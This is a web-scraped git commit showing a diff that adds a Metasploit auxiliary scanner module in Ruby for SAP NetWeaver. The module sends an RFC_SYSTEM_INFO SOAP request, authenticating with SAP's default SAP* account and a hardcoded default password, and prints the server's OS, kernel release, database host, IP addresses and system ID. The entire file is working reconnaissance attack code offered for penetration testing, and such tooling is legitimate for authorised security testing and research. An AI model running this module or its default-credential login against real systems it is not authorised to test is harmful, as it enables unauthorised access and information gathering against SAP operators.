Merge branch 'sap_soap_rfc_system_info' of https://github.com/nmonkee/metasploit-framework into nmonkee-sap_soap_rfc_system_info
commit
e72946303e
|
@ -0,0 +1,148 @@
|
||||||
|
##
|
||||||
|
# This file is part of the Metasploit Framework and may be subject to
|
||||||
|
# redistribution and commercial restrictions. Please see the Metasploit
|
||||||
|
# Framework web site for more information on licensing and terms of use.
|
||||||
|
# http://metasploit.com/framework/
|
||||||
|
##
|
||||||
|
|
||||||
|
##
|
||||||
|
# This module is based on, inspired by, or is a port of a plugin available in
|
||||||
|
# the Onapsis Bizploit Opensource ERP Penetration Testing framework -
|
||||||
|
# http://www.onapsis.com/research-free-solutions.php.
|
||||||
|
# Mariano Nunez (the author of the Bizploit framework) helped me in my efforts
|
||||||
|
# in producing the Metasploit modules and was happy to share his knowledge and
|
||||||
|
# experience - a very cool guy. I'd also like to thank Chris John Riley,
|
||||||
|
# Ian de Villiers and Joris van de Vis who have Beta tested the modules and
|
||||||
|
# provided excellent feedback. Some people just seem to enjoy hacking SAP :)
|
||||||
|
##
|
||||||
|
|
||||||
|
require 'msf/core'
|
||||||
|
|
||||||
|
class Metasploit4 < Msf::Auxiliary
|
||||||
|
|
||||||
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
include Msf::Auxiliary::Report
|
||||||
|
include Msf::Auxiliary::Scanner
|
||||||
|
|
||||||
|
def initialize
|
||||||
|
super(
|
||||||
|
'Name' => 'SAP SOAP RFC_SYSTEM_INFO',
|
||||||
|
'Description' => %q{'SAP NetWeaver could allow a remote attacker to obtain sensitive information.
|
||||||
|
By sending a RFC_SYSTEM_INFO RfcCallReceive request to TCP port 33NN an attacker
|
||||||
|
could obtain the operating system version, SAP version, and real IP address of the server.},
|
||||||
|
'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/' ]],
|
||||||
|
'Author' => [ 'Agnivesh Sathasivam','nmonkee' ],
|
||||||
|
'License' => BSD_LICENSE
|
||||||
|
)
|
||||||
|
register_options(
|
||||||
|
[
|
||||||
|
OptString.new('USERNAME', [false, 'username ', 'SAP*']),
|
||||||
|
OptString.new('PASSWORD', [false, 'password ', '06071992']),
|
||||||
|
OptString.new('CLIENT', [false, 'client ', '001']),
|
||||||
|
], self.class)
|
||||||
|
register_autofilter_ports([ 8000 ])
|
||||||
|
end
|
||||||
|
|
||||||
|
def run_host(ip)
|
||||||
|
success = false
|
||||||
|
client = datastore['CLIENT']
|
||||||
|
data = '<?xml version="1.0" encoding="utf-8" ?>'
|
||||||
|
data << '<env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:env="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">'
|
||||||
|
data << '<env:Body>'
|
||||||
|
data << '<n1:RFC_SYSTEM_INFO xmlns:n1="urn:sap-com:document:sap:rfc:functions" env:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
|
||||||
|
data << '<CURRENT_RESOURCES xsi:nil="true"></CURRENT_RESOURCES>'
|
||||||
|
data << '<MAXIMAL_RESOURCES xsi:nil="true"></MAXIMAL_RESOURCES>'
|
||||||
|
data << '<RECOMMENDED_DELAY xsi:nil="true"></RECOMMENDED_DELAY>'
|
||||||
|
data << '<RFCSI_EXPORT xsi:nil="true"></RFCSI_EXPORT>'
|
||||||
|
data << '</n1:RFC_SYSTEM_INFO>'
|
||||||
|
data << '</env:Body>'
|
||||||
|
data << '</env:Envelope>'
|
||||||
|
user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
|
||||||
|
print_status("[SAP] #{ip}:#{rport} - sending SOAP RFC_SYSTEM_INFO request")
|
||||||
|
begin
|
||||||
|
res = send_request_raw({
|
||||||
|
'uri' => '/sap/bc/soap/rfc?sap-client=' + client + '&sap-language=EN',
|
||||||
|
'method' => 'POST',
|
||||||
|
'data' => data,
|
||||||
|
'headers' =>
|
||||||
|
{
|
||||||
|
'Content-Length' => data.size.to_s,
|
||||||
|
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
|
||||||
|
'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + client,
|
||||||
|
'Authorization' => 'Basic ' + user_pass,
|
||||||
|
'Content-Type' => 'text/xml; charset=UTF-8'
|
||||||
|
}
|
||||||
|
}, 45)
|
||||||
|
if res and res.code != 500 and res.code != 200
|
||||||
|
# to do - implement error handlers for each status code, 404, 301, etc.
|
||||||
|
print_error("[SAP] #{ip}:#{rport} - something went wrong!")
|
||||||
|
return false
|
||||||
|
else
|
||||||
|
success = true
|
||||||
|
end
|
||||||
|
rescue ::Rex::ConnectionError
|
||||||
|
print_error("[SAP] #{ip}:#{rport} - Unable to connect")
|
||||||
|
return false
|
||||||
|
end
|
||||||
|
if success
|
||||||
|
print_status("[SAP] #{ip}:#{rport} - got response")
|
||||||
|
saptbl = Msf::Ui::Console::Table.new(
|
||||||
|
Msf::Ui::Console::Table::Style::Default,
|
||||||
|
'Header' => "[SAP] System Info",
|
||||||
|
'Prefix' => "\n",
|
||||||
|
'Postfix' => "\n",
|
||||||
|
'Indent' => 1,
|
||||||
|
'Columns' =>[
|
||||||
|
"Info",
|
||||||
|
"Value"
|
||||||
|
])
|
||||||
|
response = res.body
|
||||||
|
rfcproto = $1 if response =~ /<RFCPROTO>(.*)<\/RFCPROTO>/i
|
||||||
|
rfcchartyp = $1 if response =~ /<RFCCHARTYP>(.*)<\/RFCCHARTYP>/i
|
||||||
|
rfcinttyp = $1 if response =~ /<RFCINTTYP>(.*)<\/RFCINTTYP>/i
|
||||||
|
rfcflotyp = $1 if response =~ /<RFCFLOTYP>(.*)<\/RFCFLOTYP>/i
|
||||||
|
rfcdest = $1 if response =~ /<RFCDEST>(.*)<\/RFCDEST>/i
|
||||||
|
rfchost = $1 if response =~ /<RFCHOST>(.*)<\/RFCHOST>/i
|
||||||
|
rfcsysid = $1 if response =~ /<RFCSYSID>(.*)<\/RFCSYSID>/i
|
||||||
|
rfcdatabs = $1 if response =~ /<RFCDATABS>(.*)<\/RFCDATABS>/i
|
||||||
|
rfcdbhost = $1 if response =~ /<RFCDBHOST>(.*)<\/RFCDBHOST>/i
|
||||||
|
rfcdbsys = $1 if response =~ /<RFCDBSYS>(.*)<\/RFCDBSYS>/i
|
||||||
|
rfcsaprl = $1 if response =~ /<RFCSAPRL>(.*)<\/RFCSAPRL>/i
|
||||||
|
rfcmach = $1 if response =~ /<RFCMACH>(.*)<\/RFCMACH>/i
|
||||||
|
rfcopsys = $1 if response =~ /<RFCOPSYS>(.*)<\/RFCOPSYS>/i
|
||||||
|
rfctzone = $1 if response =~ /<RFCTZONE>(.*)<\/RFCTZONE>/i
|
||||||
|
rfcdayst = $1 if response =~ /<RFCDAYST>(.*)<\/RFCDAYST>/i
|
||||||
|
rfcipaddr = $1 if response =~ /<RFCIPADDR>(.*)<\/RFCIPADDR>/i
|
||||||
|
rfckernrl = $1 if response =~ /<RFCKERNRL>(.*)<\/RFCKERNRL>/i
|
||||||
|
rfchost2 = $1 if response =~ /<RFCHOST2>(.*)<\/RFCHOST2>/i
|
||||||
|
rfcsi_resv = $1 if response =~ /<RFCSI_RESV>(.*)<\/RFCSI_RESV>/i
|
||||||
|
rfcipv6addr = $1 if response =~ /<RFCIPV6ADDR>(.*)<\/RFCIPV6ADDR>/i
|
||||||
|
saptbl << [ "Release Status of SAP System", rfcsaprl ]
|
||||||
|
saptbl << [ "RFC Log Version", rfcproto ]
|
||||||
|
saptbl << [ "Kernel Release", rfckernrl ]
|
||||||
|
saptbl << [ "Operating System", rfcopsys ]
|
||||||
|
saptbl << [ "Database Host", rfcdbhost]
|
||||||
|
saptbl << [ "Central Database System", rfcdbsys ]
|
||||||
|
if rfcinttyp == 'LIT'
|
||||||
|
saptbl << [ "Integer Format", "Little Endian" ]
|
||||||
|
else
|
||||||
|
saptbl << [ "Integer Format", "Big Endian" ]
|
||||||
|
end
|
||||||
|
saptbl << [ "Hostname", rfchost ]
|
||||||
|
if rfcflotyp == 'IE3'
|
||||||
|
saptbl << [ "Float Type Format", "IEEE" ]
|
||||||
|
else
|
||||||
|
saptbl << [ "Float Type Format", "IBM/370" ]
|
||||||
|
end
|
||||||
|
saptbl << [ "IPv4 Address", rfcipaddr ]
|
||||||
|
saptbl << [ "IPv6 Address", rfcipv6addr ]
|
||||||
|
saptbl << [ "System ID", rfcsysid ]
|
||||||
|
saptbl << [ "RFC Destination", rfcdest ]
|
||||||
|
saptbl << [ "Timezone", "#{rfctzone.gsub(/\s+/, "")} (diff from UTC in seconds)" ]
|
||||||
|
saptbl << [ "Character Set", rfcchartyp ]
|
||||||
|
saptbl << [ "Daylight Saving Time", rfcdayst ]
|
||||||
|
saptbl << [ "Machine ID", rfcmach.gsub(/\s+/, "")]
|
||||||
|
print(saptbl.to_s)
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
Loading…
Reference in New Issue